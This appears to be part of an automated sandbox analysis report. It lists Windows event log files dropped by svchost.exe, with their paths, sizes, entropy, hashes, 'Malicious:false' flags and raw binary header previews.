                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.310249820592637
                            Encrypted:false
                            SSDEEP:1536:wkHsNnQw/nqUTbNXOf7PR2yWTTT3RC+OkmrHruL6RFHrbHIhLcJbEjfvNC+q9P3Y:wkMNnQw/nqUlXOf7PR2yWTTT3RC+OkmW
                            MD5:D096BE357F48740D8B3F4C4E2FC3C4AA
                            SHA1:DBE7E823E62097F7DAD5CF0B0A055BDEB60E802A
                            SHA-256:6E33C8218AD7FACA307C8704EB4CFE8F11B5272F196EBC50E7488E2BC9B24F93
                            SHA-512:8715FC934500983D4DBBADAF24904A61CF9E795411491D94904FA5B865F1B4E60F792EC336C0C0F38373C0D5778CC69D89A197F653B2A6422C5B1C9D022D8731
                            Malicious:false
                            Preview:ElfChnk.........0...............0..........................................................................................A..T................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................y...............&...................................................................................**...............pCW4........./X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Audio%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.209789619925081
                            Encrypted:false
                            SSDEEP:384:sh5pxpTpkpapApCkpCTpSpCrpCmZpCvpCXpCPpCipCm4pC0sp1pCspCnpApCzpCx:srJRkrIwoHg01RzsZrczv9ezTjlRp
                            MD5:BFAA8C3E0A4AEDF8609B8EAE3CC723B1
                            SHA1:EE2A70F15C857FFE78C1ED31B41E1BA76667E16E
                            SHA-256:40AABBEA5B7C5709939039F4C00EE2687B484E58AC79807E2ACEE1A216469DD7
                            SHA-512:CC8B9C61E024E2012C82D3AC18C4CA24FE6FC64DF39A2F4A24F9EB9787ED454DE424D3262719D4C3384D9B08164CA3691E06AE1E2E6BE2AD25646DB5593E2100
                            Malicious:false
                            Preview:ElfChnk.{...............{...................................................................................................v.Fu........................................4...=...........................................................................................................................f...............?...........................m...................M...F...............................................................&...................................................................................**......{.......}............./X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Biometrics%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.7122666366370487
                            Encrypted:false
                            SSDEEP:768:rBeqVzq0hiq1qB2YqRqhoqqqOYqGqGwqJqB:9p5
                            MD5:2005E1766DB566C345829A0615AF0490
                            SHA1:A5E66D682D62CCBABA4BE8A82B7B92C461874D96
                            SHA-256:79B51FFA0B6987D7EE0F8F2D7798E46B0F8DA45D15AD3536508C3E0E997763EE
                            SHA-512:0227E0E6E06504DFEDAFC4EBB6623F1200E66CB9968DEFD4298A1907431FF30980085D03262CC030C4EF9EF0A4C3FAC69110ED678DACE29EE470E34899C283E6
                            Malicious:false
                            Preview:ElfChnk......................................P...S..X.......................................................................sxW.........................................V...=...........................................................................................................................f...............?...........................m...................M...F.......................&........................................&..................................a...............................................**..............NIX.T...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-BitLocker%4BitLocker Management.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.4157864118318901
                            Encrypted:false
                            SSDEEP:384:5h5hTgzTgfNTgbTgdTglTgfTgJZTgfTg5TgGTgZTg:5FEYJUKu8iN0qp+
                            MD5:450759DF0038DC699F1A077F16FE743D
                            SHA1:38749387226451A069480C359793D3DF7C741EC9
                            SHA-256:CDBE979D2CC0D074914562C84F034558CE35930CE4CF22196718980531E0BE0C
                            SHA-512:A46E4900347B86A9583EFF2A6C0D7B03E138E7CC801C078E51F1FD130FF33D26196FC9940A8F6BB390AE87AECA1D858957FDE0D7FD58D09C095127677FF52FF2
                            Malicious:false
                            Preview:ElfChnk......................................@...F..............................................................................................D.......................l...=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................................................................**..P...........-..-T...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):92872
                            Entropy (8bit):2.8077602210251014
                            Encrypted:false
                            SSDEEP:384:RhuoS9VoryorOoroortorVorVorNorrmo4oruorlIoreorNorworgorDorhorcoq:RsWqGO4bsWqGO4
                            MD5:67C79A482679D1D216C459CC1F69267F
                            SHA1:35DD6753681E849F7F8A87B4C0735AD83341D942
                            SHA-256:B92C6AE723604D226E4FD3A65B70D0CC437819846B23FFA9C2E01568AF954D63
                            SHA-512:E6442FE21B57CBF05E4AE1C5D72787B0404B9F01D11DFBD3A3DB5D640ECFAD9BCAFBCA025E7EFB916684EA7497E60977C2AED225247985ABC7668D9C2D1E1C5B
                            Malicious:false
                            Preview:ElfChnk.........?...............?............h...j..S.68.....................................................................8).................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................Ef..............................**................@.S...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.704381782007547
                            Encrypted:false
                            SSDEEP:768:we9GtXOmBKLbz4ILbBuzhFSbVKb0781JgUuXMtqwfgOZUpTH4Y3a6wzfjy2ieRLG:zzuzhF4lmfV
                            MD5:71DDD331F479C0EBBC1D736C0DA02E48
                            SHA1:36D6B3EF852F889EE8A5D59B242782A5D5C1B4CB
                            SHA-256:B4F93C7A45CDD4398BF409C817FF7C6C43E34ABC69A50E656B18C32206FA6735
                            SHA-512:93D7C5D312BB084B57881CCD2707C5C7B2CCD710C6035A342CE46D1E41E4270AE132C948E8E6B8D9E17A9BC2448828E0D667DE0BDD53FB713C5CBD076B633800
                            Malicious:false
                            Preview:ElfChnk.........g...............g....................RaG....................................................................-2O.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F................................6...............................'......................................m;..........................................**..................S...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.9776112875172112
                            Encrypted:false
                            SSDEEP:384:zhDCq2cCp1Cz2TCLqCM2CZCjiCsCblCnC/iCsCe5CECOwCFCkUCXCUoCjCtorCrp:zUEJ2
                            MD5:B398C9AB251DE811A7778C7A6143504B
                            SHA1:2F1822CFC7C355AADB9C7CDBFE1475A7E1803C16
                            SHA-256:64536BDA74AFE9478A65696793E213E5F14A58B0B92A9246C8A0315ED053496A
                            SHA-512:D68E001B5C6391B685B58AC10326120C043F2E2C031498088F1E8421A374B672690AE39962E0D443DF92ABBE8F42854EB4003D37A40BFAEDB93B96BABD6776E8
                            Malicious:false
                            Preview:ElfChnk.m...............m....................e...g.....L....................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...............................................................&...................................................................................**.. ...m.........*13........./X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.936611112922836
                            Encrypted:false
                            SSDEEP:768:vey39iM13lpQaJJxfNxllEkMXNhGo1f1xFLBfd5M+IJT9Imy/OAwuM2eWE:XxWN
                            MD5:DB13AA6AFB2E9AE39DEC0AFA8BC4B49A
                            SHA1:C3AD1AF1EECCB2E8EA9F4FABCDBBD97B57811D8E
                            SHA-256:B3F23FDDF42C1C48FDD920ECEFF0327A627DFC13AC74DD74BA95DAC9E5D70BF4
                            SHA-512:0F2F51686E8942E11B58B6B79ABA43E0ED3141F5C3452C6D7BF7328DEF5E23436F95352E133B63D27175C431BD2450409C4CF2D7E8B72C107BF2114F6A024B69
                            Malicious:false
                            Preview:ElfChnk......................................A...C..a1...................................................................... H.]................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................................................**..x...........&............./X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.481313084677958
                            Encrypted:false
                            SSDEEP:384:hh8kbAP1gjk+Jk+yk/3Suhfmk+Adk+AkKuIk+2hk+Dk+rk+4k+ik+8k+4k+Uk+RD:hNAP1EHDzShpmjmoToEEltkV48m
                            MD5:945E1E22A6B006C5137975EFBBF2C153
                            SHA1:46CBE7B09D20DCCFAF614B3ADE31E454423BCB34
                            SHA-256:5F16BBF82EA7B0FD664F5666DCD7398A7FFDF4EB6B7C890351B0EECF5450D6D4
                            SHA-512:7EDCF3613AE4B806F5FA8229526145BE38B07318340EFD257CE8A35E88338F76BF54015D99CD3F9FE1237101288258590B3BA5776782DEAB9594E52F73C3CDF5
                            Malicious:false
                            Preview:ElfChnk......................................<...>....1X......................................................................0.................b...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&.......................................~...................................U...............;...............................**..x............Ft.i...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.432978599954893
                            Encrypted:false
                            SSDEEP:384:chNEuPE7VRECExEfERBElsUGIE8EP0EAEOE8VoEfqEzEXEtEsEyuEG8EVlbE7gEk:cpjZl8CTiIjV6y+pM8Lp6
                            MD5:1AB33607CC35ADEE19153EE1D625607F
                            SHA1:85D90CFD036557810077FED23A6895127C0F43FD
                            SHA-256:DA22727CBE87576EDD5EBC44479605AD6FD23CA4AD3F0892CB88FF6C40F79679
                            SHA-512:99535B020AE8126600B53D284E497CB306CB9A64590044FAE45EF02C50F1CBA470D67402CE5751C8AE6B759F9808545857F6B01C5E03604AE24E0ECC9563531A
                            Malicious:false
                            Preview:ElfChnk.X...............X.......................x...1..b.....................................................................,..................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F....................V..............=T..-.................................... ..........]3..}#..........m........\...........Y..........-1..........**......X........iB........../X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.379087428743082
                            Encrypted:false
                            SSDEEP:384:vNhPpKfzNKhiK7vKfCK5bKzTK7DKJBKHiK7VK8yKyXK1tKBKKziuKlQKt9KL0K1+:1oVJMEb
                            MD5:A67DC02B589134489270032022A94E52
                            SHA1:81D246C6BD9F4F8128C3719FCBA382F698CF6810
                            SHA-256:226EBE2EC4F7AC4A2FEFC1446091E67933F3EF5626CCC6939E8680B8B11E84C2
                            SHA-512:CD0405F457CE34B390752B1B1B5515CCE70034DEDE0B78E918786F959AB06B99E1FDFCA2308CFF98D55396F53F2DD8FFD59CF434C4FB5AFF7CF028404C3AE535
                            Malicious:false
                            Preview:ElfChnk.........9...............9...................A.........................................................................:................H.......................p...=...........................................................................................................................f...............?...........................m...................M...F...............................................!...............&...........................................................).......................**.................i........../X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):127504
                            Entropy (8bit):4.626941110419465
                            Encrypted:false
                            SSDEEP:768:fFaAl0UltbCl5kpcQVX+k/l0A45XSmzhUCtlCWuXTJEeiIAUY+lVY8o0alFwYs0c:m/LF2+H/jVj3NS/LF2+H/jVj3NP
                            MD5:834E347D9290A8CB22F280CAA723E0E0
                            SHA1:B88A550C28C4EC26D89ED362709C11C755BC2AD9
                            SHA-256:A33FAAEA5BD52823265CCE8DD5DC38E43D99FD36EC28F9BC88E72A31CCE90F06
                            SHA-512:B418732091DE916905724B5E0CB4B7613B89AD2B36C5F823E39C7829D8A72D828E60FEBD142B2F8064FE6228750BE38B05BA94603414AE3832EF8ABFBD410642
                            Malicious:false
                            Preview:ElfChnk.........m...............m...........(... ....F......................................................................S.U&................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...............................................................&...................................................................................**..P............ ,B........../X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):5.676611266803492
                            Encrypted:false
                            SSDEEP:384:2/hla5uzuzNz0zxzuewKWMKJEa5bna5czuzNz0zxzuewKWMKVa5Ka5czuzNz0zx9:2/IxmkPQXSjgN
                            MD5:216DC45E258D6DC7F9F6DE6585302CB8
                            SHA1:07B3C1918E1B050F21050A1ADCDCD525B15DA05F
                            SHA-256:E54474B775F30974295C3DFE9726AC899A2CE361E85FBC1566B5AE562B66EA1F
                            SHA-512:DAF9138115AFEAFF385670D5380A068DE403669FD214449CEC05E319D3C8FE1C23A7E623DE6E1BF5F6A9EE8A3E3FC7B55F147BD00576078044B6A0C9B45ADEF0
                            Malicious:false
                            Preview:ElfChnk.........#...............#...............x...l........................................................................k.8........................................8...=...........................................................................................................................f...............?...........................m...................M...F...............................................................&...................................................................................**...............d............/X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.80250908226514
                            Encrypted:false
                            SSDEEP:384:Rh0QMqHM3EbMYFMOuM0cMn71MuMMxsM98M0n4MBHMovMmXMqQMrdMlOMZzMWHMBL:RZWa
                            MD5:0A7816537227785FACF8A606472B10DB
                            SHA1:FEF158CB795A369294B015D9C1FF196731378E91
                            SHA-256:E56B6EC8B7CD6FBF40484E7DC9ADFD57523496713224C21E03114864D1440D7B
                            SHA-512:022B0704FB0A85BE568DA80A31721EF4F0C6CFF0B48411D79D0D665778E0D8BD18B10909E17651B2B47D7F379D9657E99213E5F8350FB1568B23111C2B69777E
                            Malicious:false
                            Preview:ElfChnk.........4...............4............Z...[..+>%p................................................................................................................>...=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................................................................**..............)..S...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.6719274221831006
                            Encrypted:false
                            SSDEEP:384:Wrhf1y61h1M1v1Rr1w1Y19121s1h1u1i1r1S1j1Y1p131G1J1c1j14141i1A141r:WraTyaZc5
                            MD5:B20ECF00FA390AD8AAB4C681E4E730ED
                            SHA1:CF276E3E1BA35D71F22B982A1E108B056999AAF1
                            SHA-256:DE0DD44B75CA8E6A859BC6CE8022103B4ECD1E24A585664C08EE7E791CADC243
                            SHA-512:C62712250306D4A42A98B8DF07CA907C47F852766F618F0017B8C5B4C1553229C41CE9399F280E0F875BB5DD4C08328F834F49A68DA6D11B93101F1B1519E001
                            Malicious:false
                            Preview:ElfChnk.........................................h...R.^........................................................................0................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................y...............)...........A.......................................................**...............X8........../X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):7032
                            Entropy (8bit):4.106877236659084
                            Encrypted:false
                            SSDEEP:192:wztk8V7n9yAmVy2ouyZ4y4Ymy2CydteVydYeykRyqFhVOy+YJVynOkyi:Y3h9yTy6y+yMyxy/6y3yoyqHVOy5VyOQ
                            MD5:56A5D3B284B827F739B14C88B8D35CCB
                            SHA1:B9BA71427078EA48B9C47B5F59C2A7AD619DBE0A
                            SHA-256:1BB9F9C16CECDDDF15AE94E4DBE9D3D11A2BF564B1772288920605995ABC71A3
                            SHA-512:3A3FC808046B2CD81823FAA38BD7E14EE26045FD686EA2FE3319B69035EF409AEB26D93FA0033F7F4DDD3A97A22F572BB94817F31F407D86951E796C8B8A1545
                            Malicious:false
                            Preview:ElfChnk.................[.......`...........0.........PW.....................................................................\..................0...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................&...................................................................................**..`...[.......:~e.........../X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):71296
                            Entropy (8bit):4.925029590303183
                            Encrypted:false
                            SSDEEP:768:rgJEtsoXXDELQXGKgJEtsoXXDERW+7zu8coO:rQMlGKQMAW+a
                            MD5:D6132B9B1169A5D0FB12F8F1B2D23D43
                            SHA1:3D62BD478983E012215D36AC274647E8BC3BA151
                            SHA-256:CE0B66B21C59CD5DAB21F3AEE3D3749102542A33E9DA38EF05D75CE02BA8865B
                            SHA-512:F7CDEB34FF2ECC5C32300D98FBEC6DAF73D1F5391A9844A46A23DDAC70B5A47B37729D5A8CB790725BBA7A2061E02B0FF93F65076E3848A96BC1DD6C5E9B7DCE
                            Malicious:false
                            Preview:ElfChnk..$.......$.......$.......$...........b..8d...g......................................................................iy^6................^...........................=...........................................................................................................................f...............?...........................m...................M...F............................................U........../......./L..........................................7....................]..................**.......$......:U.}........../X.P&...............................................................X.......n...o.!...........@.....:U.}......>7....J.>7........0....$...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.u.s.h.N.o.t.i.f.i.c.a.t.i.o.n.s.-.P.l.a.t.f.o.r.m.....D@F.q..RyCM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.u.s.h.N.o.t.i.f.i.c.a.t.i.o.n.-.P.l.a.t.f.o.r.m./.O.p.e.r.a.t.i.o.n.a.l...._.....................................PNG.....CON.rpnW89P1LEOtqRP2.6.....Context: 8367b

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:DIY-Thermocam raw data (Lepton 2.x), scale 4-8, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 10384593717069655257060992658440192.000000
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.7792834150270544
                            Encrypted:false
                            SSDEEP:384:Aho8N8M8p8d8I8K8t8v681o8t8K8aI848s8D828P8N8285818n8U858w8v8yt8+5:Aj31lT
                            MD5:DC510754AE7BC4632D833062AE6D1E84
                            SHA1:4DB61750804C2F06ACC1AC8AF28DBDA26363E456
                            SHA-256:FBBA46FF8106D5BB6231CF9AEC8D1100DD51814BDB9C32850122AD5F28FD3AF0
                            SHA-512:78F4A36F033A5F9D61424CAC625069C493F3C2D62B42182E19B9C9F938946DCA84E6B5E3A3801C64C9EBCCD6B9B93C884F66E1C9A9F83707105654B402E92758
                            Malicious:false
                            Preview:ElfChnk.........5...............5............V...W.....j......................................................................J.........................................V...=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................................................................**..(...........e...S...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.228069212226127
                            Encrypted:false
                            SSDEEP:384:LhuvnvmvJvBvdvrvwvSvovl+v4v6vvvmvcMvOyv4vCvAvTvGvP+v5vRvH8vUv5vF:LNzTEejRRDy2
                            MD5:06D6F34A9FBE48B7637E9D75AE9AAA24
                            SHA1:517A583825FCD91BC2CFFB58814AE3CE8A9DCC9D
                            SHA-256:3F6AA2BCE671C11DE60BF4DB323643527F7B3C1AB33E39EAE86F7F52CF9E8EEC
                            SHA-512:4256B485D0C71CEB732A7EFEA668E7A613D40077E06B505F95B75511CB15BE812DC552CD44656D476D07076861FBA33EE577AC2AC3FD46014180D25AEBEC0B7F
                            Malicious:false
